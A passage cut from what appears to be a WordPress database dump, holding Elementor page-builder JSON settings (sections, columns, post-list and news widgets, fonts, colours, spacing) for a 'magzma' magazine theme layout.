ght_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1113,410,'_elementor_version','0.4'),(1114,410,'_elementor_css','a:3:{s:4:\"time\";i:1508854482;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1116,411,'_edit_last','1'),(1117,411,'_edit_lock','1509552292:1'),(1121,411,'_wp_page_template','default'),(1128,414,'_elementor_edit_mode','builder'),(1129,414,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1